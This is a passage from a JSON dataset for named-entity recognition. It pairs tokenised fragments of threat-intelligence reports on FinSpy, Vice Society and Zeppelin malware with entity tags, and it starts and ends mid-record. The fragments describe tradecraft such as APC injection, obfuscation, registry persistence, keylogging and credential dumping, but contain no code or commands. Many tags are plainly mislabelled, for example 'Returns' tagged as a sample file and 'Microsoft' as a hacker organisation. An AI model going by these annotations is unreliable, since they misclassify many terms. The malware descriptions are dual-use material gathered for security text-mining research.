"Returns", - "information", - "about", - "the", - "operating", - "system" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "computer", - "name" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Overall", - "available", - "space", - "Space", - "available", - "to", - "current", - "user", - "(may", - "be", - "less", - "than", - "overall", - "available", - "space", - "due", - "to", - "quotas)", - "Disk", - "capacity" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "information", - "about", - "the", - "computer", - "system" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "checks", - "if", - "it", - "is", - "running", - "on", - "a", - "64-bit", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "OSVERSIONINFOEXW", - "and", - "SYSTEM_INFO", - "structures" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "the", - "current", - "process", - "name" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "the", - "list", - "of", - "running", - "processes" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "ProcessDebugPort", - "value", - "returned", - "by", - "NtQueryInformationProcess", - "for", - "current", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "ProcessDebugObjectHandle", - "value", - "returned", - "by", - "NtQueryInformationProcess", - "for", - "current", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "process", - "names", - "of", - "the", - "current", - "process", - "tree", - "(i.e.", - "the", - "current", - "process,", - "the", - "parent", - "process,", - "the", - "grandparent", - "process,", - "etc.)" - ], - "ner_tags": [ - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obtains", - "the", - "list", - "of", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "extract", - "specific", - "information", - "about", - "running", - "processes" - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "regularly", - "obtains", - "the", - "list", - "of", - "running", - "processes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "examines", - "all", - "the", - "processes", - "on", - "the", - "system" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "looks", - "for", - "specific", - "processes" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "acquires", - "handles", - "for", - "all", - "running", - "processes", - "on", - "the", - "system,", - "which", - "results", - "in", - "either", - "winlogon.exe", - "or", - "explorer.exe", - "obtaining", - "numerous", - "process", - "handles." - ], - "ner_tags": [ - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "it", - "detects", - "a", - "starting", - "first", - "(or", - "a", - "stopping", - "last)", - "instance", - "of", - "a", - "process", - "from", - "the", - "list" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "running", - "processes" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "part", - "of", - "code", - "from", - "the", - ".text", - "section", - "(roughly", - "8", - "KB)", - "is", - "overwritten", - "with", - "heavily", - "obfuscated", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "code" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "trampoline", - "in", - "the", - ".text", - "section." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "trampoline", - "is", - "protected", - "with", - "an", - "obfuscator" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "with", - "FinSpy", - "Mutator" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "This", - "module", - "is", - "an", - "obfuscated", - "shellcode." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "DLL" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "obfuscated", - "with", - "FinSpy", - "VM." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "It", - "is", - "encrypted", - "with", - "a", - "256-byte", - "RC4", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "conceals", - "memory", - "areas", - "that", - "contain", - "the", - "Trojan", - "components’", - "code", - "and", - "data." - ], - "ner_tags": [ - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypts", - "the", - "Orchestrator’s", - "pages", - "with", - "a", - "cipher", - "based", - "on", - "XOR", - "and", - "ROL", - "operations", - "and", - "assigns", - "the", - "PAGE_NOACCESS", - "attribute", - "to", - "them" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "protected", - "with", - "an", - "obfuscator" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "obfuscator", - "similar", - "to", - "OLLVM", - "is", - "used", - "to", - "protect", - "FinSpy" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "It", - "is", - "obfuscated", - "with", - "a", - "protector", - "resembling", - "the", - "open", - "source", - "OLLVM", - "obfuscator." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "The", - "encrypted", - "VFS", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "setup", - "configuration", - "file,", - "which", - "is", - "encrypted", - "with", - "RC4" - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "obfuscator", - "resembling", - "OLLVM", - "or", - "both", - "these", - "protectors" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "call", - "to", - "the", - "CreateWindowExW" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "NtTerminateProcess", - "and", - "ExitProcess", - "functions" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "CreateFileW", - "API." - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "API", - "function" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "various", - "WinAPI", - "functions." - ], - "ner_tags": [ - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "low-level", - "API", - "functions", - "(such", - "as", - "NtEnumerateValueKey", - "or", - "NtQuerySystemInformation)" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "NtTestAlert", - "function" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "call", - "the", - "NtTestAlert", - "function" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "NtTestAlert", - "function" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "CreateProcessInternalW", - "API", - "function" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "NtQueueAPCThread", - "function" - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "KiUserExceptionDispatcher", - "function" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "WinAPI", - "file", - "manipulation", - "functions." - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "calling", - "API", - "functions", - "from", - "this", - "library" - ], - "ner_tags": [ - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "hooks", - "the", - "kernel’s", - "PsCreateSystemThread", - "function" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "launches", - "a", - "slightly", - "modified", - "Metasploit", - "Reverse", - "HTTPS", - "stager" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "connects", - "to", - "a", - "configured", - "C2", - "server", - "using", - "HTTPS", - "for", - "communication." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Makes", - "an", - "initial", - "POST", - "request", - "to", - "the", - "C2", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "the", - "C2", - "server", - "via", - "a", - "POST", - "request." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "All", - "communications", - "between", - "the", - "server", - "are", - "encrypted", - "with", - "RC4" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "with", - "RC4" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "snippet", - "of", - "the", - "RC4", - "key", - "generation", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "the", - "list", - "of", - "network", - "adapter", - "types,", - "IP", - "and", - "MAC", - "addresses", - "assigned", - "to", - "them." - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "names", - "of", - "shortcuts", - "in", - "the", - "Desktop", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "the", - "path", - "to", - "the", - "‘Program", - "Files’", - "folder." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "the", - "short", - "form", - "of", - "the", - "user’s", - "profile", - "folder" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "the", - "user’s", - "profile", - "folder" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "the", - "list", - "of", - "object", - "names", - "in", - "the", - "\\GLOBAL??", - "directory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Retrieve", - "the", - "list", - "of", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gets", - "the", - "list", - "of", - "recent", - "files" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "search,", - "delete", - "files." - ], - "ner_tags": [ - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "file", - "listings" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Create", - "file", - "listing", - "recordings" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "the", - "path", - "to", - "the", - "user’s", - "temporary", - "folder." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "the", - "current", - "domain", - "SID" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "the", - "current", - "user���s", - "name" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Returns", - "the", - "current", - "user’s", - "SID." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WMI", - "query" - ], - "ner_tags": [ - "B-Time", - "O" - ] - }, - { - "tokens": [ - "Creates", - "a", - "scheduled", - "task", - "that", - "runs", - "at", - "system", - "startup" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Task", - "Scheduler", - "launches", - "it", - "at", - "system", - "startup" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "scheduled", - "task", - "properties" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "DLL", - "obfuscated", - "with", - "VMProtect." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "unpacking", - "the", - "Orchestrator" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "unpacks", - "it", - "with", - "aPLib." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Orchestrator", - "is", - "unpacked" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Orchestrator", - "(as", - "well", - "as", - "plugins)", - "are", - "packed", - "with", - "aPLib", - "and", - "encrypted", - "with", - "AES." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "unpacks", - "with", - "aPLib" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "with", - "XOR", - "and", - "compressed", - "with", - "aPLib." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "unpacks", - "it", - "with", - "aPLib" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "takes", - "a", - "screenshot" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "screenshots" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "screen" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "take", - "screenshots", - "during,", - "online", - "conversations." - ], - "ner_tags": [ - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Capture", - "the", - "screen", - "area", - "around", - "mouse", - "click", - "locations" - ], - "ner_tags": [ - "B-SamFile", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Take", - "screenshots", - "with", - "a", - "specified", - "frame", - "rate,", - "and", - "livestream", - "or", - "record", - "them." - ], - "ner_tags": [ - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "screenshots" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "Commands", - "are", - "used", - "to", - "download", - "and", - "install", - "plugins" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Commands", - "are", - "used", - "to", - "download", - "and", - "run", - "the", - "Trojan", - "Installer." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-SecTeam" - ] - }, - { - "tokens": [ - "Upload,", - "download" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "downloading", - "and", - "executing", - "specific", - "utilities" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "Security", - "Shellcodes", - "from", - "the", - "C2", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "may", - "save", - "recording", - "files", - "in", - "the", - "working", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "stored", - "in", - "the", - "working", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware’s", - "working", - "directory" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Once", - "the", - "working", - "directory", - "is", - "prepared," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "keylogs" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "keystrokes" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "record", - "keystrokes" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Delete", - "a", - "recording", - "with", - "a", - "given", - "filename", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uninstall", - "the", - "backdoor." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "wipes", - "all", - "the", - "files", - "and", - "registry", - "keys", - "created", - "by", - "the", - "backdoor" - ], - "ner_tags": [ - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "delete", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "creating", - "an", - "APC", - "(Asynchronous", - "Procedure", - "Call)", - "with", - "the", - "procedure", - "address", - "pointing", - "to", - "the", - "start", - "of", - "the", - "shellcode." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APC", - "injections" - ], - "ner_tags": [ - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "asynchronous", - "procedure", - "places", - "a", - "hook", - "on", - "the", - "NtTestAlert", - "function", - "and", - "then", - "exits" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "will", - "be", - "loaded", - "with", - "the", - "help", - "of", - "the", - "APC", - "injection", - "loader." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "hooked", - "process", - "creation", - "function", - "clears", - "a", - "possible", - "hook", - "of", - "the", - "NtQueueAPCThread", - "function", - "and", - "then", - "uses", - "it", - "to", - "create", - "an", - "APC", - "procedure", - "in", - "the", - "new", - "process." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "junk", - "code", - "created", - "by", - "the", - "ProcessWorm", - "loader" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "entries", - "point", - "to", - "buffers", - "of", - "randomly", - "generated", - "junk", - "code" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "method", - "names", - "contain", - "junk." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "executable", - "is", - "prepended", - "with", - "0x4000", - "random", - "bytes", - "and", - "encrypted", - "with", - "RC4" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "documents", - "sent", - "to", - "the", - "printer." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Steal", - "files", - "which", - "are", - "printed", - "by", - "the", - "victim" - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "recently", - "opened", - "documents" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Uninstall", - "a", - "plugin", - "from", - "the", - "machine" - ], - "ner_tags": [ - "B-Way", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Sets", - "up", - "persistence", - "by", - "creating", - "an", - "entry", - "in", - "the", - "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", - "registry", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "adds", - "it", - "to", - "the", - "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "Bash", - "script" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "launched", - "on", - "every", - "startup", - "by", - "rundll32.exe" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "creates", - "a", - "thread", - "in", - "the", - "kernel", - "that", - "injects", - "the", - "next", - "stage", - "into", - "winlogon.exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "A", - "thread", - "with", - "trampoline", - "shellcode", - "is", - "created", - "inside", - "exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "victim", - "downloads", - "a", - "Trojanized", - "application", - "and", - "executes", - "it." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "we", - "identified", - "numerous", - "legitimate", - "applications", - "backdoored" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TeamViewer" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "Cleans", - "API", - "functions", - "potentially", - "hooked", - "by", - "security", - "solutions" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attackers", - "also", - "exploited", - "vulnerabilities", - "such", - "as", - "PrintNightmare", - "to", - "escalate", - "privileges" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Software", - "vulnerabilities,", - "such", - "as", - "PrintNightmare", - "(CVE-2021-1675)", - "and", - "(CVE-2021-34527),", - "may", - "be", - "exploited", - "in", - "an", - "attempt", - "to", - "elevate", - "privileges." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "has", - "operated", - "sites", - "on", - "the", - "Tor", - "network", - "using", - "the", - "following", - ".onion" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "this", - "key", - "is", - "typically", - "obfuscated", - "with", - "AES", - "256", - "encryption." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "encrypted", - "PowerShell." - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Upon", - "execution,", - "the", - "ransomware", - "binary", - "deletes", - "itself" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Creating", - "the", - "HKCU\\Software\\Zeppelin", - "registry", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "by", - "modifying", - "the", - "Registry." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "valid", - "credentials", - "have", - "been", - "used", - "by", - "Vice", - "Society", - "to", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Internet-facing", - "applications", - "and", - "systems", - "vulnerabilities", - "can", - "be", - "exploited,", - "such", - "as", - "PrintNightmare", - "(CVE-2021-1675)", - "and", - "(CVE-2021-34527),", - "to", - "gain", - "initial", - "access." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "B-Features", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Batch", - "files", - "are", - "used" - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "features", - "multiple", - "flags", - "that", - "could", - "be", - "set", - "as", - "command", - "line", - "arguments" - ], - "ner_tags": [ - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Persistence", - "is", - "maintained", - "after", - "boot/reboot", - "via", - "malicious", - "autostart", - "registry", - "keys." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "utilizes", - "legitimate", - "programs", - "to", - "side-load", - "the", - "group’s", - "own", - "DLL", - "to", - "execute", - "their", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Malicious", - "commands", - "are", - "executed", - "via", - "WMI", - "as", - "a", - "means", - "of", - "“living", - "off", - "the", - "land”", - "and", - "avoiding", - "detection." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "execute", - "commands", - "via", - "scheduled", - "tasks/jobs." - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Files", - "dropped", - "in", - "the", - "victim’s", - "environment", - "by", - "Vice", - "Society", - "may", - "have", - "been", - "altered", - "to", - "appear", - "legitimate." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attempts", - "to", - "disable", - "Windows", - "Defender" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Attempts", - "to", - "disable", - "or", - "modify", - "endpoint", - "security,", - "such", - "as", - "Microsoft", - "Defender,", - "on", - "compromised", - "devices." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-SecTeam", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "utilizes", - "comsvcs.dll", - "to", - "dump", - "credentials", - "from", - "Local", - "Security", - "Authority", - "Subsystem", - "Service." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDP", - "is", - "used", - "by", - "the", - "group", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-HackOrg", - 